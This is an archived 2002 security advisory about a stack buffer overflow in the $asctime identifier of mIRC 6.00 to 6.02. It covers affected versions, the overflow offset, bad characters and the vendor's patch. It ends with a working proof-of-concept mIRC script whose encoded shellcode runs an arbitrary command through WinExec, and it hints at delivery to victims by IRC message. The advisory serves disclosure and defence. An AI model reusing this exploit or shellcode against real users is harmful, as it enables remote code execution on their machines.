
adv-002-mirc.htm
Posted Aug 30, 2002
Authored by James Martin | Site uuuppz.com

Many scripts installed in mIRC below version 6.03 allow remote compromise if they use the $asctime identifier, which is used to format unix time stamps. Includes proof of concept code which causes mIRC to execute a command line on any supported OS. Most users have not yet upgraded.

tags | exploit, remote, proof of concept
systems | unix
SHA-256 | 7bbc56e28d283a43eccbc8e827589188437b85d0ee6f7ebe44afd3e5cf94b646


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Research - uuuppz.com (security/mIRC $asctime overflow)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="http://www.uuuppz.com/uuuppz.css" type="text/css">
<script language="JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
  // Undo MM_swapImage: put every image recorded in document.MM_sr back to the
  // src it had before the rollover. The walk stops at the first entry that is
  // missing or has no saved oSrc, exactly like the original loop condition.
  var swapped = document.MM_sr;
  if (!swapped) return;
  for (var idx = 0; idx < swapped.length; idx++) {
    var img = swapped[idx];
    if (!img || !img.oSrc) break;
    img.src = img.oSrc;
  }
}

function MM_preloadImages() { //v3.0
  // Start fetching each image URL passed as an argument so later rollovers
  // have the picture ready. The Image objects are appended to document.MM_p,
  // which is created on first use. Arguments starting with "#" are skipped.
  var doc = document;
  if (!doc.images) return;
  if (!doc.MM_p) doc.MM_p = new Array();
  var cache = doc.MM_p;
  var next = cache.length;
  var urls = arguments;
  for (var k = 0; k < urls.length; k++) {
    var url = urls[k];
    if (url.indexOf("#") == 0) continue;
    cache[next] = new Image;
    cache[next++].src = url;
  }
}

function MM_findObj(n, d) { //v4.0
  // Locate an element by name in document d (defaults to the current
  // document). A name written as "name?frame" is looked up inside
  // parent.frames[frame] instead. Tries, in order: d[n], d.all[n], each
  // form's n property, each layer's document (recursively), and finally
  // document.getElementById(n). Returns the first hit, else a falsy value.
  if (!d) d = document;
  var sep = n.indexOf("?");
  if (sep > 0 && parent.frames.length) {
    d = parent.frames[n.substring(sep + 1)].document;
    n = n.substring(0, sep);
  }
  var found = d[n];
  if (!found && d.all) found = d.all[n];
  for (var f = 0; !found && f < d.forms.length; f++) {
    found = d.forms[f][n];
  }
  for (var l = 0; !found && d.layers && l < d.layers.length; l++) {
    found = MM_findObj(n, d.layers[l].document);
  }
  if (!found && document.getElementById) found = document.getElementById(n);
  return found;
}

function MM_swapImage() { //v3.0
  // Rollover helper. Arguments arrive in triples (name, unused, newSrc)
  // followed by a trailing lone value that the i < length-2 bound ignores
  // (the callers on this page pass a final 1). Each image found by name
  // keeps its original src in oSrc and is appended to document.MM_sr so
  // MM_swapImgRestore can put it back.
  var args = MM_swapImage.arguments;
  var restoreList = new Array;
  document.MM_sr = restoreList;
  var count = 0;
  for (var pos = 0; pos < args.length - 2; pos += 3) {
    var img = MM_findObj(args[pos]);
    if (img == null) continue;
    restoreList[count++] = img;
    if (!img.oSrc) img.oSrc = img.src;
    img.src = args[pos + 2];
  }
}
//-->
</script>
</head>

<body bgcolor="#FFFFFF" text="#000000" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" onLoad="MM_preloadImages('../images/intro_on.jpg','../images/cons_on.jpg','../images/res_on.jpg','../images/cv_on.jpg','../images/cred_on.jpg')" link="#000000" vlink="#999999" alink="#666666">
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%">
<tr>
<td valign="top" align="center"> <br>
<table width="760" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td rowspan="2" valign="top" width="260">
<table width="260" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/top.jpg" width="260" height="216" alt="uuuppz Logo"></td>
</tr>
<tr>
<td><a href="../index.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Intro Link','','../images/intro_on.jpg',1)"><img name="Intro Link" border="0" src="../images/intro_off.jpg" width="260" height="22" alt="Introduction"></a></td>
</tr>
<tr>
<td><a href="../consult/consulting.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Consulting Link','','../images/cons_on.jpg',1)"><img name="Consulting Link" border="0" src="../images/cons_off.jpg" width="260" height="21" alt="Consulting"></a></td>
</tr>
<tr>
<td><a href="../research/research.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Research Link','','../images/res_on.jpg',1)"><img name="Research Link" border="0" src="../images/res_off.jpg" width="260" height="22" alt="Research"></a></td>
</tr>
<tr>
<td><a href="../cv.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('CV Link','','../images/cv_on.jpg',1)"><img name="CV Link" border="0" src="../images/cv_off.jpg" width="260" height="22" alt="Curriculum Vitae"></a></td>
</tr>
<tr>
<td><a href="../credits.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Credits Link','','../images/cred_on.jpg',1)"><img name="Credits Link" border="0" src="../images/cred_off.jpg" width="260" height="22" alt="Credits"></a></td>
</tr>
<tr>
<td><img src="../images/bot.jpg" width="260" height="7" alt="spacer"></td>
</tr>
</table>
</td>
<td width="600" height="14"></td>
</tr>
<tr>
<td width="500" valign="top">
<table width="500" border="0" cellspacing="1" cellpadding="0" align="center" bgcolor="#000000">
<tr>
<td bgcolor="#FFFFFF">
<table width="500" border="0" cellspacing="0" cellpadding="0" height="300">
<tr bgcolor="#666666">
<td height="1" colspan="4"></td>
</tr>
<tr>
<td rowspan="3" width="1" bgcolor="#666666"></td>
<td height="1" colspan="3" bgcolor="#999999"></td>
</tr>
<tr>
<td width="1" rowspan="2" bgcolor="#999999"></td>
<td height="1" bgcolor="#CCCCCC" colspan="2"></td>
</tr>
<tr>
<td width="1" bgcolor="#CCCCCC"></td>
<td width="497" valign="top">
<blockquote>
<p><br>
<span class="title">Research</span> <span class="content">::
</span> <span class="fotter"><a href="research.htm">Summary</a></span>
<span class="content"> :: </span> <span class="fotter"><a href="irc3.htm">IRC3</a></span>
<span class="content">:: </span> <span class="fotter"><a href="utils.htm">Utilities</a></span>
<span class="content">:: </span> <span class="fotter">Security</span><br>
</p>

<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>

<td width="13%"><span class="title">Security </span></td>
<td width="2%"><span class="content">::</span></td>

<td width="85%"><span class="fotter"> <a href="adv-001-mirc.htm">Advisory
001 - mIRC Current Nickname overflow</a></span></td>
</tr>
<tr>

<td width="13%">&nbsp;</td>

<td width="2%"><span class="content">::</span></td>

<td width="85%" class="fotter">Advisory 002 - mIRC
$asctime overflow</td>
</tr>
</table>

<p class="title">Advisory 002 - mIRC $asctime overflow</p>
<span class="content"><b>Discovery</b><br>
Originally discovered by Phrizer (DalNET #KORP); researched and documented by James Martin (aka uuuppz).

</span>
<p> <span class="content"><b>Vulnerable</b><br>
mIRC V6.00, V6.01, V6.02.
</span>
<p> <span class="content"><b>Impact</b><br>
Low to high, a vanilla installation of mIRC does not contain any attack vector to allow a remote compromise. However many scripts introduce an attack vector allowing arbitrary code execution through exploitation of this flaw.
</span>

<p><span class="content"><b>Vendor Response</b><br>
The vendor was informed on 30/7/2002 and was provided with the proof of concept code. mIRC 6.03, which includes a fix for this issue, was released on 16/08/02. No response was sent to me. It is worth noting that the vendor has not made any effort to inform its userbase of this flaw, or of the flaw in versions prior to 6.0 which was released earlier this year. As a result a large number of users have not upgraded; of course it's difficult to make all users upgrade, but vendor recognition is a big factor.<p>

Using a rather rough method I performed mass CTCP VERSION requests on several major channels, located on a number of networks. Around 30% of users seem to still be running mIRC 5.91 or lower. About 60% are using mIRC 6.00-6.02. <p>

A number of major scripts currently advise users not to upgrade to mIRC 6.00 or later as they do not work on the new version. Hence users of these scripts are not being encouraged to upgrade. Vendor acknowledgement of the flaws in my opinion would help persuade the maintainers of these scripts to take more aggressive action.<p>

</span>
<p> <span class="content"><b>Solution</b><br>
Download mIRC 6.03 from <a href="http://www.mirc.com" tppabs="http://www.mirc.com">http://www.mirc.com</a><br>
<p> <span class="content"><b>Description</b><br>
mIRC provides scripting capabilities to allow extension of the client. A flaw exists in the $asctime identifier, which is used to format Unix style time stamps. Passing a string of sufficient length to $asctime will cause a buffer overflow on the stack. This allows the execution of byte code through calling $asctime with a carefully constructed string.<p>

The default script included with mIRC does not call $asctime at any point. However the majority of major scripts available for download call $asctime to decode data provided by the irc server. Many scripts call $asctime on data provided from other remote sources. The exploitation of this flaw therefore depends on the script installed by the victim.
</span>
<p> <span class="content"><b>Details</b><br>$asctime can be called in four forms, depending on the number and type of parameters passed:
<ul><li>No parameters eg "//echo 1 $asctime hello!", this formats the current time as mIRC wishes.</li>
<li>With a time format only eg "//echo 1 $asctime(hh:mm) hello!", this formats the current time using the format specified.</li>
<li>With a time stamp only eg "//echo 1 $asctime(10203234) hello!", this formats the time stamp specified as mIRC wishes.</li>
<li>With both a time stamp and a time format eg "//echo 1 $asctime(1020334,hh:mm)", this formats the specified timestamp as specified by the format string.</li>
</ul>
The format parameter is where the overflow occurs. If only one parameter is specified mIRC will treat it as a timestamp (as per form 3) if it only contains numeric characters; otherwise the parameter will be treated as a time format. Vulnerable scripts contain code similar to "//echo 1 uuuppz is idle since $asctime($4)", where $4 is taken directly from the irc server or some other remote source. <p>
If the string passed as the format specifier is longer than 388 bytes the return address on the stack will be overwritten. There are a number of special characters that cannot be used in the string; the ASCII codes for these are [72,84,90,100,104,109,110,115,116,121,122]. Other characters may not be possible to use depending on the circumstances.

</span>
<p> <span class="content"><b>Exploit</b><br>

Below is sample mIRC script code that creates a string that causes $asctime to execute a command line. Parameters may be given. The code functions on all vulnerable versions of mIRC and all supported operating systems.<p>

<code>
<br>; Proof of concept Code for asctime exploit
<br>; Author: James Martin
<br>; Website: http://www.uuuppz.com
<br>; Email: me@uuuppz.com
<br>;
<br>; Usage:
<br>; /asctime_poc notepad c:\autoexec.nat
<br>; /asctime_poc command.com /c echo Your have been rooted > c:\rooted.txt
<br>; etc :)
<br>;
<br>;
<br>/asctime_poc {
<br> ; Set Show State
<br> ;
<br> ; Valid Values:
<br> ; 1 - Show Normal (This will break a ctcp request)
<br> ; 2 - Minimise (If your being evil... ;))
<br> ; 3 - Maximise
<br> set %showstate 2
<p>
; Build Coded Command String
<br> set %command $1-
<br> set %count 1
<br> unset %codedcommand
<br> :loop
<br> set %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))
<br> set %count $calc( %count + 1)
<br> if %count <= $len(%command) goto loop

<p> ; Shell Code to Execute
<br> ;
<br> ; Detects mirc version, decodes the command string then calls winexec
<br> set %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3)

<p> ; Build Exploit String
<br> set %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2-$len(%command))) $+ q $+ $chr(17) $+ $chr(64)

<p> ; Run exploit string
<br> ;
<br> ; In the real world it would be more like
<br> ; /msg muppet weirdcommand %exploitstring
<br> echo 1 $asctime(%exploitstring)
<br>}
<br></code>
</span>
</blockquote>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF" height="18">
<table width="500" border="0" cellspacing="0" cellpadding="0" height="18">
<tr>
<td bgcolor="#666666" width="1"></td>
<td bgcolor="#999999" width="1"></td>
<td bgcolor="#CCCCCC" width="1"></td>
<td width="497">
<div align="center"><span class="content"><b class="fotter">Hosting
provided by <a
href="http://www.biznet-solutions.com/" target="_blank">BizNet Solutions</a>.
Powered by <a href="http://www.debian.org/" target="_blank">Debian.</a></b></span></div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<p>&nbsp;</p></td>
</tr>
</table>
</body>
</html>